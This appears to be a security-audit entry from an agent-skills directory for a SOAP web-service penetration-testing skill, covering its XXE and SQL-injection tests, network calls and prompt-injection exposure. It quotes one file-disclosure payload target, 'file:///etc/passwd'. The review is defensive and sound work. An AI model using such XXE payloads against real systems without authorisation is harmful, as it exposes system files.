The Agent Skills Directory

[SAFE]: The skill is a specialized tool for cybersecurity penetration testing. Its implementations of common vulnerability test cases (e.g., XXE, SQLi) are transparently documented and align with industry-standard testing methodologies.
[EXTERNAL_DOWNLOADS]: The skill uses the Python 'requests' library to fetch WSDL definitions and interact with SOAP endpoints. These network operations are controlled by user-provided parameters (URL/endpoint) and are necessary for the skill's intended function.
[DATA_EXFILTRATION]: The code includes payloads designed to test for file disclosure (e.g., 'file:///etc/passwd' in XXE tests). These are used locally for vulnerability validation and do not involve unauthorized exfiltration of user data to a remote server.
[PROMPT_INJECTION]: As a security testing utility, the skill processes external WSDL data and SOAP responses which are untrusted inputs. While there is a surface for indirect prompt injection, the data is processed programmatically for testing logic and is not used to influence the agent's core behavioral instructions.
Ingestion points: 'requests.get' for WSDL files and 'requests.post' for service responses in 'scripts/agent.py'.
Boundary markers: None explicitly defined to separate untrusted data from the agent context.
Capability inventory: Network operations via 'requests' to perform SOAP calls.
Sanitization: No specific sanitization or validation of the remote XML structure beyond standard parsing with 'lxml'.

performing-soap-web-service-security-testing